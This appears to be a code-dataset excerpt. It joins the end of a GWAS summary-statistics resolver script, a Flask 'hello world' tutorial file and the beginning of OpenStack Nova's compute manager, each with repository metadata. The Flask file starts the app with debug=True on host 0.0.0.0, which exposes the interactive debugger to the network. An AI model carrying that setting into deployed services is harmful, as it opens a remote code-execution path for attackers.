SNPs_rsID_FILE_o = io.TextIOWrapper(io.BufferedReader(SNPs_rsID_FILE_o_gz))
resolvers.append(resolve_ChrBP)
resolvers_args.append([SNPs_rsID_FILE_o])
if not DOING_LIFTOVER and GWAS_SORTING == 'ChrBP' and (issues['rsID'] or issues['OA'] or issues['EA'] or issues['EAF']) and file_exists(SNPs_FILE):
"""
These resolvers assumes GWAS SS file is sorted by Chr and BP in accord to the SNPs file
"""
SNPs_FILE_o_gz: io.RawIOBase = gzip.open(SNPs_FILE, 'r') # type: ignore # GzipFile and RawIOBase _are_ in fact compatible
SNPs_FILE_o = io.TextIOWrapper(io.BufferedReader(SNPs_FILE_o_gz))
resolvers.append(resolve_rsID)
resolvers_args.append([SNPs_FILE_o])
if issues['SE'] and issues['beta']<total_entries and issues['pval']<total_entries:
resolvers.append(resolve_SE)
resolvers_args.append([])
if issues['beta'] and issues['SE']<total_entries and issues['pval']<total_entries:
resolvers.append(resolve_beta)
resolvers_args.append([])
if issues['pval'] and issues['beta']<total_entries and issues['SE']<total_entries:
resolvers.append(resolve_pval)
resolvers_args.append([])
#
# STEP #2
# Loop through the GWAS SS file,
# For each row, run all assembled resolvers, and FINALLY save the row to the output file
#
# copy the first line that is the header
line_i = copy_line(line_i)
try:
while True:
fields = get_next_line_in_GWASSS()
run_all(resolvers, fields, resolvers_args)
write_line_to_GWASSS(fields)
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of the file
pass
else:
print(f'An error occured on line {line_i} of the GWAS SS file (see below)')
raise e
GWAS_FILE_o.close()
OUTPUT_GWAS_FILE_o.close()
| 32.17976 | 166 | 0.59304 |
4a1e3b0ee813805b2a38a496f99da1499f3f0f4b | 205 | py | Python | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | [
"MIT"
] | null | null | null | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | [
"MIT"
] | null | null | null | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | [
"MIT"
] | null | null | null | from flask import Flask, jsonify
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
return "Hello World"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True) | 20.5 | 50 | 0.64878 |
4a1e3b40091fbe8dcd64af3b667eddb979f993b2 | 393,419 | py | Python | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import binascii
import contextlib
import functools
import inspect
import random
import sys
import time
import traceback
from cinderclient import exceptions as cinder_exception
from cursive import exception as cursive_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneauth1 import exceptions as keystone_exception
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_service import loopingcall
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova import compute
from nova.compute import build_results
from nova.compute import claims
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute.utils import wrap_instance_event
from nova.compute import vm_states
from nova import conductor
import nova.conf
from nova.console import rpcapi as console_rpcapi
import nova.context
from nova import exception
from nova import exception_wrapper
from nova import hooks
from nova.i18n import _
from nova import image
from nova import manager
from nova import network
from nova.network import base_api as base_net_api
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import instance as obj_instance
from nova.objects import migrate_data as migrate_data_obj
from nova.pci import whitelist
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import utils as scheduler_utils
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova.volume import cinder
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception_wrapper.wrap_exception,
get_notifier=get_notifier,
binary='nova-compute')
@contextlib.contextmanager
def errors_out_migration_ctxt(migration):
"""Context manager to error out migration on failure."""
try:
yield
except Exception:
with excutils.save_and_reraise_exception():
if migration:
# We may have been passed None for our migration if we're
# receiving from an older client. The migration will be
# errored via the legacy path.
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug(
'Error setting migration status for instance %s.',
migration.instance_uuid, exc_info=True)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
migration = keyed_args['migration']
with errors_out_migration_ctxt(migration):
return function(self, context, *args, **kwargs)
return decorated_function
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info("Task possibly preempted: %s",
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance = keyed_args['instance']
original_task_state = instance.task_state
try:
self._instance_update(context, instance, task_state=None)
LOG.info("Successfully reverted task state from %s on "
"failure for instance.",
original_task_state, instance=instance)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
# after it errored out this is an expected case and we
# should not trace on it.
pass
except Exception as e:
LOG.warning("Failed to revert task state for instance. "
"Error: %s", e, instance=instance)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.__code__.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except exception.ImageNotFound:
# Since we're trying to cleanup an image, we don't care if
# if it's already gone.
pass
except Exception:
LOG.exception("Error while trying to clean up image %s",
image_id, instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# TODO(alaski): Actually remove this after Newton, assuming a major RPC bump
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, name, tag):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param name: the name of the event we're expecting
:param tag: the tag associated with the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
instance_events = self._events.setdefault(instance.uuid, {})
return instance_events.setdefault((name, tag),
eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(name)s-%(tag)s',
{'name': name, 'tag': tag}, instance=instance)
return _create_or_get_event()
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if self._events is None:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop((event.name, event.tag), None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
# NOTE(danms): We have historically returned the raw internal
# format here, which is {event.key: [events, ...])} so just
# trivially convert it here.
return {'%s-%s' % k: e
for k, e in self._events.pop(instance.uuid, {}).items()}
return _clear_events()
def cancel_all_events(self):
if self._events is None:
LOG.debug('Unexpected attempt to cancel events during shutdown.')
return
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for (name, tag), eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(name)s-%(tag)s for '
'instance %(instance_uuid)s',
{'name': name,
'tag': tag,
'instance_uuid': instance_uuid})
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
class ComputeVirtAPI(virtapi.VirtAPI):
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element is a
tuple of strings to indicate (name, tag),
where name is required, but tag may be None.
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, name, tag))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='5.0')
# How long to wait in seconds before re-issuing a shutdown
# signal to an instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = cinder.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self.reportclient = self.scheduler_client.reportclient
self._resource_tracker = None
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool(
size=CONF.sync_power_state_pool_size)
self.instance_running_pool = utils.PoolProxy(eventlet.GreenPool(
size=CONF.instance_running_pool_size))
self._syncs_in_progress = {}
self.send_instance_updates = (
CONF.filter_scheduler.track_instance_changes)
if CONF.max_concurrent_builds > 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
if CONF.max_concurrent_builds_per_project > 0:
self._per_project_build_semaphore = nova.utils.Semaphores(
semaphore_default=lambda: eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds_per_project))
else:
self._per_project_build_semaphore = nova.utils.Semaphores(
compute_utils.UnlimitedSemaphore)
if CONF.max_concurrent_live_migrations > 0:
self._live_migration_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_live_migrations)
else:
self._live_migration_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def reset(self):
LOG.info('Reloading compute RPC API')
compute_rpcapi.LAST_VERSION = None
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
def _get_resource_tracker(self):
if not self._resource_tracker:
rt = resource_tracker.ResourceTracker(self.host, self.driver)
self._resource_tracker = rt
return self._resource_tracker
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if instance.host == self.host:
rt = self._get_resource_tracker()
rt.update_usage(context, instance, instance.node)
def _instance_update(self, context, instance, **kwargs):
"""Update an instance in the database using kwargs as value."""
for k, v in kwargs.items():
setattr(instance, k, v)
instance.save()
self._update_resource_tracker(context, instance)
def _nil_out_instance_obj_host_and_node(self, instance):
# NOTE(jwcroppe): We don't do instance.save() here for performance
# reasons; a call to this is expected to be immediately followed by
# another call that does instance.save(), thus avoiding two writes
# to the database layer.
instance.host = None
instance.node = None
def _set_instance_obj_error_state(self, context, instance,
clean_task_state=False):
try:
instance.vm_state = vm_states.ERROR
if clean_task_state:
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
# NOTE(mjozefcz): In this case we need to apply host filter.
# Without this all instance data would be fetched from db.
filters['host'] = self.host
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. This method looks for evacuation migration
records where this is the source host and which were either started
(accepted) or complete (done). From those migration records, local
instances reported by the hypervisor are compared to the instances
for the migration records and those local guests are destroyed, along
with instance allocation records in Placement for this node.
"""
filters = {
'source_compute': self.host,
# NOTE(mriedem): Migration records that have been accepted are
# included in case the source node comes back up while instances
# are being evacuated to another host. We don't want the same
# instance being reported from multiple hosts.
'status': ['accepted', 'done'],
'migration_type': 'evacuation',
}
with utils.temporary_mutation(context, read_deleted='yes'):
evacuations = objects.MigrationList.get_by_filters(context,
filters)
if not evacuations:
return
evacuations = {mig.instance_uuid: mig for mig in evacuations}
local_instances = self._get_instances_on_driver(context)
evacuated = [inst for inst in local_instances
if inst.uuid in evacuations]
# NOTE(gibi): We are called from init_host and at this point the
# compute_nodes of the resource tracker has not been populated yet so
# we cannot rely on the resource tracker here.
compute_nodes = {}
for instance in evacuated:
migration = evacuations[instance.uuid]
LOG.info('Deleting instance as it has been evacuated from '
'this host', instance=instance)
try:
network_info = self.network_api.get_instance_nw_info(
context, instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info('Instance has been marked deleted already, '
'removing it from the hypervisor.',
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
# delete the allocation of the evacuated instance from this host
if migration.source_node not in compute_nodes:
try:
cn_uuid = objects.ComputeNode.get_by_host_and_nodename(
context, self.host, migration.source_node).uuid
compute_nodes[migration.source_node] = cn_uuid
except exception.ComputeHostNotFound:
LOG.error("Failed to clean allocation of evacuated "
"instance as the source node %s is not found",
migration.source_node, instance=instance)
continue
cn_uuid = compute_nodes[migration.source_node]
if not scheduler_utils.remove_allocation_from_compute(
context, instance, cn_uuid, self.reportclient):
LOG.error("Failed to clean allocation of evacuated instance "
"on the source node %s",
cn_uuid, instance=instance)
migration.status = 'completed'
migration.save()
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage',
instance=instance)
shared_storage = False
except Exception:
LOG.exception('Failed to check if instance shared',
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._complete_deletion(context,
instance,
bdms,
system_meta)
def _complete_deletion(self, context, instance, bdms,
system_meta):
self._update_resource_tracker(context, instance)
rt = self._get_resource_tracker()
rt.reportclient.delete_allocation_for_instance(context, instance.uuid)
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.DELETE,
phase=fields.NotificationPhase.END, bdms=bdms)
self._delete_scheduler_instance_info(context, instance.uuid)
def _init_instance(self, context, instance):
"""Initialize this instance during service init."""
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.',
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down, or in an error state can not be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
LOG.exception('Failed to complete a deletion',
instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
# may be set by the api but the host is not so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
# spawned so set to ERROR state. This is consistent to BUILD
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
LOG.exception('Failed to cleanup snapshot.', instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance['task_state'], instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.', instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._delete_instance(context, instance, bdms)
except Exception:
# we don't want that an exception blocks the init_host
LOG.exception('Failed to complete a deletion',
instance=instance)
self._set_instance_obj_error_state(context, instance)
return
current_power_state = self._get_power_state(context, instance)
try_reboot, reboot_type = self._retry_reboot(context, instance,
current_power_state)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
# NOTE(mikal): if the instance was doing a soft reboot that got as
# far as shutting down the instance but not as far as starting it
# again, then we've just become a hard reboot. That means the
# task state for the instance needs to change so that we're in one
# of the expected task states for a hard reboot.
if (instance.task_state in task_states.soft_reboot_states and
reboot_type == 'HARD'):
instance.task_state = task_states.REBOOT_PENDING_HARD
instance.save()
self.reboot_instance(context, instance, block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
# Some virt driver didn't support pause and unpause
pass
except Exception:
LOG.exception('Failed to unpause instance', instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance, True)
except Exception:
# we don't want that an exception blocks the init_host
LOG.exception('Failed to stop instance', instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
LOG.exception('Failed to start instance', instance=instance)
return
net_info = instance.get_network_info()
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception("Vifs plug failed", instance=instance)
self._set_instance_obj_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception('Failed to revert crashed migration',
instance=instance)
finally:
LOG.info('Instance found in migrating state during '
'startup. Resetting task_state',
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
self._resume_guests_state(context, instance, net_info)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'firewall rules', instance=instance)
def _resume_guests_state(self, context, instance, net_info):
LOG.info('Rebooting instance after nova-compute restart.',
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning('Hypervisor driver does not support '
'resume guests', instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning('Failed to resume instance',
instance=instance)
self._set_instance_obj_error_state(context, instance)
def _retry_reboot(self, context, instance, current_power_state):
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
